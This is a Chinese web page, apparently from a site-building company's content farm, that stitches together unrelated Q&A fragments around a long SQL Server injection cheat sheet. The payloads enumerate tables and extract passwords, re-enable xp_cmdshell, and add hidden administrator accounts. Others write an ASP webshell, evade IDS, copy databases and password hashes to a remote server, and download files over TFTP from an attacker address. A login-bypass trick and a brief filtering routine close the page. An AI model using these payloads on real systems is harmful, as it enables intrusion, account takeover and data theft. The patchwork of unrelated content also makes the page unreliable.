新聞中心
有關(guān)騰訊數(shù)據(jù)庫泄露,如何查詢數(shù)據(jù)庫
此題已經(jīng)失去時效性,請回收!
創(chuàng)新互聯(lián)服務(wù)緊隨時代發(fā)展步伐,進(jìn)行技術(shù)革新和技術(shù)進(jìn)步,經(jīng)過十多年的發(fā)展和積累,已經(jīng)匯集了一批資深網(wǎng)站策劃師、設(shè)計師、專業(yè)的網(wǎng)站實施團(tuán)隊以及高素質(zhì)售后服務(wù)人員,并且完全形成了一套成熟的業(yè)務(wù)流程,能夠完全依照客戶要求對網(wǎng)站進(jìn)行做網(wǎng)站、網(wǎng)站建設(shè)、建設(shè)、維護(hù)、更新和改版,實現(xiàn)客戶網(wǎng)站對外宣傳展示的首要目的,并為客戶企業(yè)品牌互聯(lián)網(wǎng)化提供全面的解決方案。
騰訊數(shù)據(jù)庫泄露已經(jīng)是2013年的事情了!
SQLServer最大數(shù)據(jù)儲存量是多少?
幾百萬的數(shù)據(jù)量對于一個數(shù)據(jù)庫來說是很小的量了。
大型數(shù)據(jù)庫軟件都支持海量的數(shù)據(jù),就是說,只要你擴(kuò)充存儲空間(硬盤、光盤),理論上數(shù)據(jù)庫軟件可以支持無限量的數(shù)據(jù)。
攻擊、入侵電腦的定義是什么?
攻擊就是破壞,不管什么手段,只要把對方干掉即可
入侵 指未經(jīng)許可通過非法手段進(jìn)入別人的電腦,目的可能是破壞,也可能是盜取重要文件等等
常用的,SQL注入,XSS,命令執(zhí)行,上傳,弱口令,掃描備份文件,社工,包括找0DAY之類的,拿旁站然后提權(quán),實在不行就C段嗅探,這里面每一項都分為不同的方向,比如弱口令,可以是FTP,SSH,SQLSERVER,MYSQL,VNC,PCANYWHERE,3389等的弱口令,社工也分為不同的方向,其實這里社工的概念最廣,這個要看自己的領(lǐng)悟了
網(wǎng)站入侵有N中方法,就是方法名我想也沒有一個人能說全
SYN/ACK Flood攻擊
TCP全連接攻擊
刷Script腳本攻擊
獲取口令 (比如有的論壇有默認(rèn)密碼帳戶,你沒有改掉)
電子郵件攻擊
特洛伊木馬攻擊
誘入法
尋找系統(tǒng)漏洞
sql注入
一般的攻擊:tcpflood,ip碎片包,icmpflood,http(通常是cc),synflood,udpflood(基本上這么多另外一些只不過名字不一樣但是是這幾種協(xié)議的變異攻擊),web的通常有iis解析,列目錄,上傳文件,文件包含,爆庫,sql注入,xss跨站,csrf,arp攻擊 社工
sql注入的語句特征
1.判斷有無注入點
; and 1=1 and 1=2
2.猜表一般的表的名稱無非是admin adminuser user pass password 等..
and 0(select count(*) from *)
and 0(select count(*) from admin) ---判斷是否存在admin這張表
3.猜帳號數(shù)目 如果遇到0 返回正確頁面, 1返回錯誤頁面,說明帳號數(shù)目就是1個
and 0(select count(*) from admin)
and 1(select count(*) from admin)
4.猜解字段名稱 在len( ) 括號里面加上我們想到的字段名稱.
and 1=(select count(*) from admin where len(*)0)--
and 1=(select count(*) from admin where len(用戶字段名稱name)0)
and 1=(select count(*) from admin where len(密碼字段名稱password)0)
5.猜解各個字段的長度 猜解長度就是把0變換 直到返回正確頁面為止
and 1=(select count(*) from admin where len(*)0)
and 1=(select count(*) from admin where len(name)6) 錯誤
and 1=(select count(*) from admin where len(name)5) 正確 長度是6
and 1=(select count(*) from admin where len(name)=6) 正確
and 1=(select count(*) from admin where len(password)11) 正確
and 1=(select count(*) from admin where len(password)12) 錯誤 長度是12
and 1=(select count(*) from admin where len(password)=12) 正確
6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用戶帳號的第一位
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用戶帳號的第二位
就這樣一次加一個字符這樣猜,猜到夠你剛才猜出來的多少位了就對了,帳號就算出來了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
這個查詢語句可以猜解中文的用戶和密碼.只要把后面的數(shù)字換成中文的ASSIC碼就OK.最后把結(jié)果再轉(zhuǎn)換成字符.
group by users. id having 1=1--
group by users. id,users.username,users.password,users.privs having 1=1--
; insert into users values( 666,attacker,foobar,0xffff )--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN
(login_id)-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN
(login_id,login_name)-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
看服務(wù)器打的補(bǔ)丁=出錯了打了SP4補(bǔ)丁
and 1=(select @@VERSION)--
看數(shù)據(jù)庫連接賬號的權(quán)限,返回正常,證明是服務(wù)器角色sysadmin權(quán)限。
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
判斷連接數(shù)據(jù)庫帳號。(采用SA賬號連接 返回正常=證明了連接賬號是SA)
and sa=(SELECT System_user)--
and user_name()=dbo--
and 0(select user_name()--
看xp_cmdshell是否刪除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
xp_cmdshell被刪除,恢復(fù),支持絕對路徑的恢復(fù)
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
反向PING自己實驗
;use master;declare @s int;exec sp_oacreate wscript.shell,@s out;exec sp_oamethod @s,run,NULL,cmd.exe /c ping 192.168.0.1;--
加帳號
;DECLARE @shell INT EXEC SP_OACREATEwscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C:\WINNT\system32\cmd.exe
/c net user jiaoniang$ 1866574 /add--
創(chuàng)建一個虛擬目錄E盤:
;declare @o int exec sp_oacreatewscript.shell,@o out exec sp_oamethod @o,run,NULL,cscript.exec:\inetpub\wwwroot\mkwebdir.vbs -w 默認(rèn)Web站點 -v e,e:\--
訪問屬性:(配合寫入一個webshell)
declare @o int exec sp_oacreate wscript.shell,@o out exec sp_oamethod @o,run,NULL,cscript.exec:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
爆庫 特殊技巧::%5c=\ 或者把/和\ 修改%5提交
and 0(select top 1 paths from newtable)--
得到庫名(從1到5都是系統(tǒng)的id,6以上才可以判斷)
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0(select count(*) from master.dbo.sysdatabases where name1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的數(shù)據(jù)庫名
and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一個表 假設(shè)為 admin
and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 來得到其他的表。
and 0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid(str(id))) 暴到UID的數(shù)值假設(shè)為18779569 uid=id
and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一個admin的一個字段,假設(shè)為 user_id
and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(id,...)) 來暴出其他的字段
and 0(select user_id from BBS.dbo.admin where username1) 可以得到用戶名
依次可以得到密碼。假設(shè)存在user_id username,password 等字段
and 0(select count(*) from master.dbo.sysdatabases where name1 and dbid=6)
and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
and 0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid(str(id))) 判斷id值
and 0(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
得到WEB路徑
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread
@rootkey=HKEY_LOCAL_MACHINE,@key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\,@value_name=/,
values=@testOUTPUT insert into paths(path) values(@test)--
;use ku1;--
;create table cmd (str image);-- 建立image類型的表cmd
存在xp_cmdshell的測試過程:
;exec master..xp_cmdshell dir
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帳號
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes
/active:yes /add;--
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
exec master..xp_servicecontrol start,schedule 啟動服務(wù)
exec master..xp_servicecontrol start,server
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C:\WINNT\system32
\cmd.exe /c net user jiaoniang$ 1866574 /add
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C:\WINNT\system32\cmd.exe
/c net localgroup administrators jiaoniang$ /add
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上傳文件
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目錄bak.dat
如果被限制則可以。
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
查詢構(gòu)造:
SELECT * FROM news WHERE id=... AND topic=... AND .....
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass
select 123;--
;use master;--
:a or name like fff%;-- 顯示有一個叫ffff的用戶哈。
and 1(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status0) where name=ffff;--
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id581577110) where name=ffff;--
;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
上面的語句是得到數(shù)據(jù)庫中的第一個用戶表,并把表名放在ffff用戶的郵箱字段中。
通過查看ffff的用戶資料可得第一個用表叫ad
然后根據(jù)表名ad得到這個表的ID 得到第二個表的名字
insert into users values( 666,char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),char(0x63)+char(0x68)+char(0x72)+char
(0x69)+char(0x73),0xffff)--
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123,admin--,password,0xffff)--
;and user0
;and (select count(*) from sysobjects)0
;and (select count(*) from mysysobjects)0 //為access數(shù)據(jù)庫
枚舉出數(shù)據(jù)表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status0);--
這是將第一個表名更新到aaa的字段處。
讀出第一個表,第二個表可以這樣讀出來(在條件后加上 and name;剛才得到的表名)。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status0 and namevote);--
然后id=1552 and exists(select * from aaa where aaa5)
讀出第二個表,一個個的讀出,直到?jīng)]有為止。
讀字段是這樣:
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
然后id=152 and exists(select * from aaa where aaa5)出錯,得到字段名
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
然后id=152 and exists(select * from aaa where aaa5)出錯,得到字段名
[獲得數(shù)據(jù)表名][將字段值更新為表名,再想法讀出這個字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status0 [ and name;你得到的表名 查出一個加一個])
[ where 條件] select top 1 name from sysobjects where xtype=u and status0 and name not in(table1,table2,…)
通過SQLSERVER注入漏洞建數(shù)據(jù)庫管理員帳號和系統(tǒng)管理員帳號[當(dāng)前帳號必須是SYSADMIN組]
[獲得數(shù)據(jù)表字段名][將字段值更新為字段名,再想法讀出這個字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_name(object_id(要查詢的數(shù)據(jù)表名),字段列如:1) [ where 條件]
繞過IDS的檢測[使用變量]
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
開啟遠(yuǎn)程數(shù)據(jù)庫
基本語法
select * from OPENROWSET(SQLOLEDB,server=servername;uid=sa;pwd=123,select * from table1 )
參數(shù): (1) OLEDB Provider name
其中連接字符串參數(shù)可以是任何端口用來連接,比如
select * from OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table
復(fù)制目標(biāo)主機(jī)的整個數(shù)據(jù)庫insert所有遠(yuǎn)程表到本地表。
基本語法:
insert into OPENROWSET(SQLOLEDB,server=servername;uid=sa;pwd=123,select * from table1) select * from table2
這行語句將目標(biāo)主機(jī)上table2表中的所有數(shù)據(jù)復(fù)制到遠(yuǎn)程數(shù)據(jù)庫中的table1表中。實際運用中適當(dāng)修改連接字符串的IP地址和端口,指向需要的地方,比如:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from
table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
select * from master.dbo.sysdatabases
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
select * from user_database.dbo.sysobjects
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
select * from user_database.dbo.syscolumns
復(fù)制數(shù)據(jù)庫:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * fromdatabase..table2
復(fù)制哈西表(HASH)登錄密碼的hash存儲于sysxlogins中。方法如下:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select
* from database.dbo.sysxlogins
得到hash之后,就可以進(jìn)行暴力破解。
遍歷目錄的方法:先創(chuàng)建一個臨時表:temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 獲得當(dāng)前所有驅(qū)動器
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 獲得子目錄列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 獲得所有子目錄的目錄樹結(jié)構(gòu),并寸入temp表中
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某個文件的內(nèi)容
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
;insert into temp(id) exec master.dbo.xp_cmdshell cscript. C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree適用權(quán)限PUBLIC)
寫入表:
語句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
語句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
語句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
語句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
語句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
語句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
語句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
語句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
語句9:and 1=(SELECT IS_MEMBER(db_owner));--
把路徑寫到表中去:
;create table dirs(paths varchar(100),id int)--
;insert dirs exec master.dbo.xp_dirtree c:\--
and 0(select top 1 paths from dirs)--
and 0(select top 1 paths from dirs where paths not in(@Inetpub))--
;create table dirs1(paths varchar(100),id int)--
;insert dirs exec master.dbo.xp_dirtree e:\web--
and 0(select top 1 paths from dirs1)--
把數(shù)據(jù)庫備份到網(wǎng)頁目錄:下載
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 參看相關(guān)表。
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user1)
-=-wscript.shellexample -=-
declare @o int
exec sp_oacreate wscript.shell,@o out
exec sp_oamethod @o,run,NULL,notepad.exe
; declare @o int exec sp_oacreate wscript.shell,@o out exec sp_oamethod @o,run,NULL,notepad.exe--
declare @o int,@f int,@t int,@ret int
declare @line varchar(8000)
exec sp_oacreate scripting.filesystemobject,@o out
exec sp_oamethod @o,opentextfile,@f out,c:\boot.ini,1
exec @ret = sp_oamethod @f,readline,@line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f,readline,@line out
end
declare @o int,@f int,@t int,@ret int
exec sp_oacreate scripting.filesystemobject,@o out
exec sp_oamethod @o,createtextfile,@f out,c:\inetpub\wwwroot\foo.asp,1
exec @ret = sp_oamethod @f,writeline,NULL,
% set o = server.createobject(wscript.shell): o.run( request.querystring(cmd) ) %
declare @o int,@ret int
exec sp_oacreate speech.voicetext,@o out
exec sp_oamethod @o,register,NULL,foo,bar
exec sp_oasetproperty @o,speed,150
exec sp_oamethod @o,speak,NULL,all your sequel servers are belong to,us,528 waitfor delay 00:00:05
; declare @o int,@ret int exec sp_oacreate speech.voicetext,@o out exec sp_oamethod @o,register,NULL,foo,bar exec
sp_oasetproperty @o,speed,150 exec sp_oamethod @o,speak,NULL,all your sequel servers are belong to us,528 waitfor delay 00:00:05--
xp_dirtree適用權(quán)限PUBLIC
exec master.dbo.xp_dirtree c:\
返回的信息有兩個字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
create table dirs(paths varchar(100),id int)
建表,這里建的表是和上面xp_dirtree相關(guān)連,字段相等、類型相同。
insert dirs exec master.dbo.xp_dirtree c:\
只要我們建表與存儲進(jìn)程返回的字段相定義相等就能夠執(zhí)行!達(dá)到寫表的效果.
電腦打開SQLserver數(shù)據(jù)庫,鼠標(biāo)就不能用,關(guān)上數(shù)據(jù)庫就能用
1、首先確定鍵鼠設(shè)備自身是正常的,接其他電腦試試?
2、是否鍵盤可以進(jìn)主板bios,進(jìn)系統(tǒng)或PE就不能用了?單獨接鍵盤或鼠標(biāo)試試
這種故障一般先排查軟件問題,然后再排查硬件問題,你先把硬盤掛在別的電腦上把資料備份了,或者用遠(yuǎn)程登陸方式操作電腦,備份資料,檢查系統(tǒng)情況
不行就重裝或覆蓋安裝系統(tǒng)
也可以直接看看主板電容有沒有爆的,也不排除是主板電容、接口等問題
sql注入的注入方法
先猜表名
And (Select count(*) from 表名)0
猜列名
And (Select count(列名) from 表名)0
或者也可以這樣
and exists (select * from 表名)
and exists (select 列名 from 表名)
返回正確的,那么寫的表名或列名就是正確
這里要注意的是,exists這個不能應(yīng)用于猜內(nèi)容上,例如and exists (select len(user) from admin)3 這樣是不行的
很多人都是喜歡查詢里面的內(nèi)容,一旦iis沒有關(guān)閉錯誤提示的,那么就可以利用報錯方法輕松獲得庫里面的內(nèi)容
獲得數(shù)據(jù)庫連接用戶名:;and user0
這個是小竹提出來的,我這里引用《SQL注入天書》里面的一段話來講解:
重點在and user0,我們知道,user是SQLServer的一個內(nèi)置變量,它的值是當(dāng)前連接的用戶名,類型為nvarchar。拿一個 nvarchar的值跟int的數(shù)0比較,系統(tǒng)會先試圖將nvarchar的值轉(zhuǎn)成int型,當(dāng)然,轉(zhuǎn)的過程中肯定會出錯,SQLServer的出錯提示是:將nvarchar轉(zhuǎn)換int異常,XXXX不能轉(zhuǎn)換成int
看到這里大家明白了吧,報錯的原理就是利用SQLserver內(nèi)置的系統(tǒng)表進(jìn)行轉(zhuǎn)換查詢,轉(zhuǎn)換過程會出錯,然后就會顯示出在網(wǎng)頁上,另外還有類似的and 1=(selet top 1 user from admin),這種語句也是可以爆出來的。;and db_name()0 則是暴數(shù)據(jù)庫名。
一旦關(guān)閉了IIS報錯,那么還可以用union(聯(lián)合查詢)來查內(nèi)容,主要語句就是
Order by 10
And 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
And 1=2 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
上面的order by 10主要就是查字段數(shù)目,admin就是表名,可以自己猜,user,passwd是列名
反正就是返回正確即對,返回異常即錯
另外還有十分常用的ASCII碼拆半法
先要知道指定列名,例如user里的內(nèi)容的長度
and (select len(user) from admin)=2 就是查詢長度為不為2位,返回錯誤的增加或減少數(shù)字,一般這個數(shù)字不會太大,太大的就要放棄了,猜也多余
后面的邏輯符號可以根據(jù)不同要求更改的,
;大于 ;小于 =就是等于咯,更新語句的話,=也可以表示傳遞符號 ;就是不等
知道了長度后就可以開始猜解了
And (Select top 1 asc(mid(user,n,1)) from admin)100
n就是猜解的表名的第幾位,最后的長度數(shù)字就是剛才猜解出來的列名長度了,And (Select top 1 asc(mid(user,1,1)) from admin)100 就是猜解user里內(nèi)容的第一位的ASCII字符是不是大于100
正確的話,那么表示USER第一個字符的ASCII碼大于100,那么就猜120,返回錯誤就是介于100-120之間,然后再一步一步的縮少,最終得到正確字符XXX,然后用ASCII轉(zhuǎn)換器吧這個轉(zhuǎn)換成普通字符就可以了
然后就是第二位 And (Select top 1 asc(mid(user,2,1)) from admin)100 一直猜下去
加在url后面,列名表名還是先猜解,返回正確的代表帳號的ASCII碼大于100,那么就再向前猜,直到報錯,把猜出來的ASCII碼拿去ASCII轉(zhuǎn)換器轉(zhuǎn)換就可以了,中文是負(fù)數(shù),加上asb取絕對值
And (Select top 1 asb(asc(mid(user,n,1))) from admin)15320
得到之后就記得在數(shù)字前加-號,不然ASCII轉(zhuǎn)換器轉(zhuǎn)換不來的,中文在ASCII碼里是-23423這樣的,所以猜起來挺麻煩
這個猜解速度比較慢,但是效果最好,最具有廣泛性 后臺身份驗證繞過漏洞
驗證繞過漏洞就是'or'='or'后臺繞過漏洞,利用的就是AND和OR的運算規(guī)則,從而造成后臺腳本邏輯性錯誤
例如管理員的賬號密碼都是admin,那么再比如后臺的數(shù)據(jù)庫查詢語句是
user=request(user)
passwd=request(passwd)
sql='select admin from adminbate where user=''''user'''' and passwd=''''passwd'''
那么我使用'or 'a'='a來做用戶名密碼的話,那么查詢就變成了
select admin from adminbate where user=''or 'a'='a' and passwd=''or 'a'='a'
這樣的話,根據(jù)運算規(guī)則,這里一共有4個查詢語句,那么查詢結(jié)果就是 假or真and假or真,先算and 再算or,最終結(jié)果為真,這樣就可以進(jìn)到后臺了
這種漏洞存在必須要有2個條件,第一個:在后臺驗證代碼上,賬號密碼的查詢是要同一條查詢語句,也就是類似
sql=select * from admin where username='username'passwd='passwd'
如果一旦賬號密碼是分開查詢的,先查帳號,再查密碼,這樣的話就沒有辦法了。
第二就是要看密碼加不加密,一旦被MD5加密或者其他加密方式加密的,那就要看第一種條件有沒有可以,沒有達(dá)到第一種條件的話,那就沒有戲了 防御方法
對于怎么防御SQL注入呢,這個網(wǎng)上很多,我這里講幾個
如果自己編寫防注代碼,一般是先定義一個函數(shù),再在里面寫入要過濾的關(guān)鍵詞,如select ; “”;from;等,這些關(guān)鍵詞都是查詢語句最常用的詞語,一旦過濾了,那么用戶自己構(gòu)造提交的數(shù)據(jù)就不會完整地參與數(shù)據(jù)庫的操作。
當(dāng)然如果你的網(wǎng)站提交的數(shù)據(jù)全部都是數(shù)字的,可以使用小竹提供的方法
Function SafeRequest(ParaName,ParaType)
'--- 傳入?yún)?shù) ---
'ParaName:參數(shù)名稱-字符型
'ParaType:參數(shù)類型-數(shù)字型(1表示以上參數(shù)是數(shù)字,0表示以上參數(shù)為字符)
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write 參數(shù) ParaName 必須為數(shù)字型!
Response.end
End if
Else
ParaValue=replace(ParaValue,','')
End if
SafeRequest=ParaValue
End function
然后就用SafeRequest()來過濾參數(shù) ,檢查參數(shù)是否為數(shù)字,不是數(shù)字的就不能通過。 SQL注入的手法相當(dāng)靈活,在注入的時候會碰到很多意外的情況。能不能根據(jù)具體情況進(jìn)行分析,構(gòu)造巧妙的SQL語句,從而成功獲取想要的數(shù)據(jù),是高手與“菜鳥”的根本區(qū)別。
本文標(biāo)題:sqlserver爆庫,數(shù)據(jù)庫暴庫
本文網(wǎng)址:http://www.dlmjj.cn/article/hogods.html